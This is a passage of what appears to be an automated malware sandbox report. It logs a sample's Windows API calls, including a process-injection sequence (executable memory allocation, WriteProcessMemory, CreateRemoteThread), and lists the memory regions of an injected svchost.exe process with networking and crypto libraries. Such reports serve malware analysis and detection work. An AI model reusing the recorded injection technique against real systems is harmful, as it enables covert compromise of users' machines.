pszFmt="%02X", arglist=0xdcf28c | out: pszDest="30") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="8A") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="97") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="7C") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="30") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="F1") returned 2 [0064.323] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=1, lpName="AD0000002B4477546D3A308A977C30F1") returned 0x220 [0064.323] GetLastError () returned 0x0 [0064.323] IsBadReadPtr (lp=0xbd0000, ucb=0x24000) returned 0 [0064.323] VirtualAllocEx (hProcess=0x210, lpAddress=0x0, dwSize=0x24000, flAllocationType=0x3000, flProtect=0x40) returned 0x5b0000 [0064.324] WriteProcessMemory (in: hProcess=0x210, lpBaseAddress=0x5b0000, lpBuffer=0x11f47e0*, nSize=0x24000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x11f47e0*, lpNumberOfBytesWritten=0x0) returned 1 [0064.330] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x220, hTargetProcessHandle=0x210, lpTargetHandle=0xdcf3a4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xdcf3a4*=0x4) returned 1 [0064.330] WriteProcessMemory (in: hProcess=0x210, lpBaseAddress=0x5ce724, lpBuffer=0xdcf3b4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf3b4*, lpNumberOfBytesWritten=0x0) returned 1 [0064.330] WriteProcessMemory (in: hProcess=0x210, lpBaseAddress=0x5ce840, lpBuffer=0xdcf3a8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf3a8*, lpNumberOfBytesWritten=0x0) returned 1 [0064.331] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x1dc, hTargetProcessHandle=0x210, lpTargetHandle=0xdcf390, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xdcf390*=0x8) returned 1 [0064.331] WriteProcessMemory (in: hProcess=0x210, lpBaseAddress=0x5cee38, lpBuffer=0xdcf390*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf390*, lpNumberOfBytesWritten=0x0) returned 1 [0064.332] CreateRemoteThread (in: hProcess=0x210, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5bc978, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0064.333] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x1388) returned 0x102 [0069.333] CloseHandle (hObject=0x218) returned 1 [0069.333] CloseHandle (hObject=0x220) returned 1 [0069.333] CloseHandle (hObject=0x21c) returned 1 [0069.333] CloseHandle (hObject=0x210) returned 1 [0069.333] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="B3") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="9E") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="9C") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="21") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="6B") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="16") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="6D") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="44") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="70") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="93") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="2D") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0069.334] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="78") returned 2 [0069.334] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="B30000009E9C216B166D4470932D0078") returned 0x210 [0069.335] SetEvent (hEvent=0x210) returned 1 [0069.335] CloseHandle (hObject=0x210) returned 1 [0069.335] CloseHandle (hObject=0x1e0) returned 1 [0069.335] ExitProcess (uExitCode=0x0) Thread: id = 4 os_tid = 0x8e4 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x48a8f000" os_pid = "0x2ec" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x84" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\" Region: id = 281 start_va = 0x900000 end_va = 0x90afff entry_point = 0x902720 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" Region: id = 282 start_va = 0xdb0000 end_va = 0x4daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 283 start_va = 0x4db0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 284 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 285 start_va = 0x4de0000 end_va = 0x4df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 286 start_va = 0x4e00000 end_va = 0x4e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 287 start_va = 0x4e40000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 288 start_va = 0x4e80000 end_va = 0x4e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e80000" filename = "" Region: id = 289 start_va = 0x4e90000 end_va = 0x4e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e90000" filename = "" Region: id = 290 start_va = 0x4ea0000 end_va = 0x4ea1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 291 start_va = 0x773d0000 end_va = 0x77548fff entry_point = 0x773d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" Region: id = 292 start_va = 0x7e8e0000 end_va = 0x7e902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8e0000" filename = "" Region: id = 293 start_va = 0x7e909000 end_va = 0x7e909fff entry_point = 0x0 region_type = private name = "private_0x000000007e909000" filename = "" Region: id = 294 start_va = 0x7e90b000 end_va = 0x7e90dfff entry_point = 0x0 region_type = private name = "private_0x000000007e90b000" filename = "" Region: id = 295 start_va = 0x7e90e000 end_va = 0x7e90efff entry_point = 0x0 region_type = private name = "private_0x000000007e90e000" filename = "" Region: id = 296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 297 start_va = 0x7fff0000 end_va = 0x7dfd2ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 298 start_va = 0x7dfd2ef60000 end_va = 0x7ffd2ef5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd2ef60000" filename = "" Region: id = 299 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 300 start_va = 0x7ffd2f122000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffd2f122000" filename = "" Region: id = 301 start_va = 0x4eb0000 end_va = 0x4ed3fff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 302 start_va = 0x4ee0000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 303 start_va = 0x4f20000 end_va = 0x4f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 304 start_va = 0x50f0000 end_va = 0x50f6fff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 305 start_va = 0x5100000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 306 start_va = 0x64da0000 end_va = 0x64e12fff entry_point = 0x64db2f50 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" Region: id = 307 start_va = 0x64e20000 end_va = 0x64e6efff entry_point = 0x64e36ae0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" Region: id = 308 start_va = 0x7e906000 end_va = 0x7e908fff entry_point = 0x0 region_type = private name = "private_0x000000007e906000" filename = "" Region: id = 309 start_va = 0x4db0000 end_va = 0x4dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 310 start_va = 0x4f60000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 311 start_va = 0x4fa0000 end_va = 0x4fdffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 312 start_va = 0x5000000 end_va = 0x5003fff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 313 start_va = 0x5010000 end_va = 0x50cdfff entry_point = 0x5010000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 314 start_va = 0x5200000 end_va = 0x52fffff entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 315 start_va = 0x64e70000 end_va = 0x64e77fff entry_point = 0x64e71460 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" Region: id = 316 start_va = 0x74470000 end_va = 0x744c8fff entry_point = 0x744a8cc0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" Region: id = 317 start_va = 0x744d0000 end_va = 0x744d9fff entry_point = 0x744d2aa0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" Region: id = 318 start_va = 0x744e0000 end_va = 0x744fdfff entry_point = 0x744eb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" Region: id = 319 start_va = 0x75b70000 end_va = 0x75c1bfff entry_point = 0x75ba36b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" Region: id = 320 start_va = 0x76460000 end_va = 0x7654ffff entry_point = 0x764737d0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" Region: id = 321 start_va = 0x76e90000 end_va = 0x76ed2fff entry_point = 0x76e9f570 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" Region: id = 322 start_va = 0x76fa0000 end_va = 0x77115fff entry_point = 0x7703c9a0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" Region: id = 323 start_va = 0x7e7e0000 end_va = 0x7e8dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7e0000" filename = "" Region: id = 324 start_va = 0x7e903000 end_va = 0x7e905fff entry_point = 0x0 region_type = private name = "private_0x000000007e903000" filename = "" Region: id = 325 start_va = 0x5360000 end_va = 0x5363fff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 326 start_va = 0x5400000 end_va = 0x54fffff entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 327 start_va = 0x55c0000 end_va = 0x55c4fff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 328 start_va = 0x745a0000 end_va = 0x7465dfff entry_point = 0x745d5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" Region: id = 329 start_va = 0x76d70000 end_va = 0x76deafff entry_point = 0x76d8e3b0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" Region: id = 330 start_va = 0x5600000 end_va = 0x57cffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 331 start_va = 0x5600000 end_va = 0x56fffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 332 start_va = 0x5700000 end_va = 0x5a36fff entry_point = 0x5700000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 333 start_va = 0x74360000 end_va = 0x7438efff entry_point = 0x74379530 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" Region: id = 334 start_va = 0x74390000 end_va = 0x743aafff entry_point = 0x74399010 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" Region: id = 335 start_va = 0x743b0000 end_va = 0x743c2fff entry_point = 0x743b9500 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" Region: id = 336 start_va = 0x4dc0000 end_va = 0x4dc0fff entry_point = 0x4dc0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\svchost.exe.mui" Region: id = 337 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 338 start_va = 0x4fe0000 end_va = 0x4fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 339 start_va = 0x5a40000 end_va = 0x5bc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a40000" filename = "" Region: id = 340 start_va = 0x5bd0000 end_va = 0x5d50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005bd0000" filename = "" Region: id = 341 start_va = 0x5d60000 end_va = 0x715ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d60000" filename = "" Region: id = 342 start_va = 0x74660000 end_va = 0x747acfff entry_point = 0x747125d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" Region: id = 343 start_va = 0x75dd0000 end_va = 0x75f0ffff entry_point = 0x75de0280 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" Region: id = 344 start_va = 0x769c0000 end_va = 0x76adffff entry_point = 0x76a046e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" Region: id = 345 start_va = 0x76ae0000 end_va = 0x76b23fff entry_point = 0x76afd810 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" Region: id = 346 start_va = 0x77120000 end_va = 0x772d9fff entry_point = 0x771fcbb0 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" Region: id = 347 start_va = 0x77350000 end_va = 0x7737afff entry_point = 0x773552b0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" Region: id = 348 start_va = 0x75f10000 end_va = 0x75f15fff entry_point = 0x75f11480 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" Region: id = 349 start_va = 0x740f0000 end_va = 0x74313fff entry_point = 0x741d3100 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" Region: id = 350 start_va = 0x4ff0000 end_va = 0x4ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 351 start_va = 0x74350000 end_va = 0x74359fff entry_point = 0x74353200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" Region: id = 352 start_va = 0x74320000 end_va = 0x74347fff entry_point = 0x74327880 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" Region: id = 541 start_va = 0x5300000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 542 start_va = 0x5370000 end_va = 0x53affff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 543 start_va = 0x53b0000 end_va = 0x53effff entry_point = 0x0 region_type = private name = "private_0x00000000053b0000" filename = "" Region: id = 544 start_va = 0x5500000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 545 start_va = 0x5540000 end_va = 0x557ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 546 start_va = 0x5580000 end_va = 0x55bffff entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 547 start_va = 0x7160000 end_va = 0x725ffff entry_point = 0x0 region_type = private name = "private_0x0000000007160000" filename = "" Region: id = 548 start_va = 0x7260000 end_va = 0x735ffff entry_point = 0x0 region_type = private name = "private_0x0000000007260000" filename = "" Region: id = 549 start_va = 0x7360000 end_va = 0x745ffff entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 550 start_va = 0x7460000 end_va = 0x755ffff entry_point = 0x0 region_type = private name = "private_0x0000000007460000" filename = "" Region: id = 551 start_va = 0x7560000 end_va = 0x759ffff entry_point = 0x0 region_type = private name = "private_0x0000000007560000" filename = "" Region: id = 552 start_va = 0x75a0000 end_va = 0x769ffff entry_point = 0x0 region_type = private name = "private_0x00000000075a0000" filename = "" Region: id = 553 start_va = 0x76a0000 end_va = 0x76dffff entry_point = 0x0 region_type = private name = "private_0x00000000076a0000" filename = "" Region: id = 554 start_va = 0x76e0000 end_va = 0x77dffff entry_point = 0x0 region_type = private name = "private_0x00000000076e0000" filename = "" Region: id = 555 start_va = 0x7e7cb000 end_va = 0x7e7cdfff entry_point = 0x0 region_type = private name = "private_0x000000007e7cb000" filename = "" Region: id = 556 start_va = 0x7e7ce000 end_va = 0x7e7d0fff entry_point = 0x0 region_type = private name = "private_0x000000007e7ce000" filename = "" Region: id = 557 start_va = 0x7e7d1000 end_va = 0x7e7d3fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d1000" filename = "" Region: id = 558 start_va = 0x7e7d4000 end_va = 0x7e7d6fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d4000" filename = "" Region: id = 559 start_va = 0x7e7d7000 end_va = 0x7e7d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d7000" filename = "" Region: id = 560 start_va = 0x7e7da000 end_va = 0x7e7dcfff entry_point = 0x0 region_type = private name = "private_0x000000007e7da000" filename = "" Region: id = 561 start_va = 0x7e7dd000 end_va = 0x7e7dffff entry_point = 0x0 region_type = private name = "private_0x000000007e7dd000" filename = "" Region: id = 562 start_va = 0x4ee0000 end_va = 0x4efefff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 563 start_va = 0x4ee0000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 564 start_va = 0x4f20000 end_va = 0x4f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 565 start_va = 0x73e20000 end_va = 0x740e0fff entry_point = 0x74050310 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" Region: id = 566 start_va = 0x76df0000 end_va = 0x76e7cfff entry_point = 0x76e391a0 region_type = mapped_file name = "SHCore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" Region: id = 567 start_va = 0x7e906000 end_va = 0x7e908fff entry_point = 0x0 region_type = private name = "private_0x000000007e906000" filename = "" Region: id = 568 start_va = 0x765f0000 end_va = 0x76764fff entry_point = 0x766477d0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" Region: id = 569 start_va = 0x768f0000 end_va = 0x768fdfff entry_point = 0x768f5460 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" Region: id = 570 start_va = 0x73cc0000 end_va = 0x73e1ffff entry_point = 0x73d2d910 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" Region: id = 571 start_va = 0x50d0000 end_va = 0x50e2fff entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 572 start_va = 0x76e80000 end_va = 0x76e8bfff entry_point = 0x76e83920 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" Region: id = 573 start_va = 0x743f0000 end_va = 0x74464fff entry_point = 0x744298d0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" Region: id = 574 start_va = 0x79a0000 end_va = 0x79a4fff entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 575 start_va = 0x7a00000 end_va = 0x7baffff entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 576 start_va = 0x7a00000 end_va = 0x7afffff entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 577 start_va = 0x747b0000 end_va = 0x75b6efff entry_point = 0x74969ea0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" Region: id = 578 start_va = 0x75f20000 end_va = 0x763fcfff entry_point = 0x76117460 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" Region: id = 579 start_va = 0x50d0000 end_va = 0x50d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 580 start_va = 0x76e80000 end_va = 0x76e8bfff entry_point = 0x76e83920 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" Region: id = 581 start_va = 0x77340000 end_va = 0x7734efff entry_point = 0x77342e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" Region: id = 582 start_va = 0x77380000 end_va = 0x773c3fff entry_point = 0x77387280 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" Region: id = 583 start_va = 0x76550000 end_va = 0x765e1fff entry_point = 0x765844d0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" Region: id = 586 start_va = 0x50e0000 end_va = 0x50e0fff entry_point = 0x50e0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" Region: id = 587 start_va = 0x5340000 end_va = 0x5340fff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 588 start_va = 0x76950000 end_va = 0x76956fff entry_point = 0x76951d40 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" Region: id = 589 start_va = 0x76960000 end_va = 0x769bbfff entry_point = 0x769736b0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" Region: id = 590 start_va = 0x743d0000 end_va = 0x743e0fff entry_point = 0x743d42a0 region_type = mapped_file name = "OnDemandConnRouteHelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" Region: id = 591 start_va = 0x5340000 end_va = 0x5352fff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 592 start_va = 0x73c90000 end_va = 0x73cbffff entry_point = 0x73c94c40 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" Region: id = 593 start_va = 0x73c80000 end_va = 0x73c87fff entry_point = 0x73c82040 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" Region: id = 594 start_va = 0x73bd0000 end_va = 0x73c76fff entry_point = 0x73c105d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" Region: id = 595 start_va = 0x5340000 end_va = 0x534ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005340000" filename = "" Region: id = 596 start_va = 0x73b80000 end_va = 0x73bcdfff entry_point = 0x73b8c610 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" Region: id = 597 start_va = 0x73af0000 end_va = 0x73b73fff entry_point = 0x73aff1c0 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" Region: id = 598 start_va = 0x5350000 end_va = 0x5350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005350000" filename = "" Region: id = 599 start_va = 0x73ae0000 end_va = 0x73ae7fff entry_point = 0x73ae1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" Region: id = 600 start_va = 0x55d0000 end_va = 0x55e2fff entry_point = 0x0 region_type = private name = "private_0x00000000055d0000" filename = "" Region: id = 601 start_va = 0x73a90000 end_va = 0x73ad5fff entry_point = 0x73aa4930 region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" Region: id = 602 start_va = 0x53f0000 end_va = 0x53f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053f0000" filename = "" Region: id = 603 start_va = 0x73880000 end_va = 0x73a88fff entry_point = 0x739074f0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" Region: id = 604 start_va = 0x55d0000 end_va = 0x55d2fff entry_point = 0x55d0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" Region: id = 605 start_va = 0x55e0000 end_va = 0x55e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055e0000" filename = "" Region: id = 606 start_va = 0x73820000 end_va = 0x7387ffff entry_point = 0x73839550 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" Region: id = 607 start_va = 0x77e0000 end_va = 0x77f2fff entry_point = 0x0 region_type = private name = "private_0x00000000077e0000" filename = "" Region: id = 608 start_va = 0x55f0000 end_va = 0x55f0fff entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 609 start_va = 0x737c0000 end_va = 0x737e7fff entry_point = 0x737d5630 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" Region: id = 610 start_va = 0x737f0000 end_va = 0x7380ffff entry_point = 0x737fcde0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" Region: id = 611 start_va = 0x73810000 end_va = 0x7381ffff entry_point = 0x73814530 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" Region: id = 612 start_va = 0x737b0000 end_va = 0x737b7fff entry_point = 0x737b1da0 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" Region: id = 613 start_va = 0x76900000 end_va = 0x76941fff entry_point = 0x76916510 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" Region: id = 614 start_va = 0x77e0000 end_va = 0x781ffff entry_point = 0x0 region_type = private name = "private_0x00000000077e0000" filename = "" Region: id = 615 start_va = 0x7820000 end_va = 0x785ffff entry_point = 0x0 region_type = private name = "private_0x0000000007820000" filename = "" Region: id = 616 start_va = 0x73790000 end_va = 0x737aefff entry_point = 0x73798e70 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" Region: id = 617 start_va = 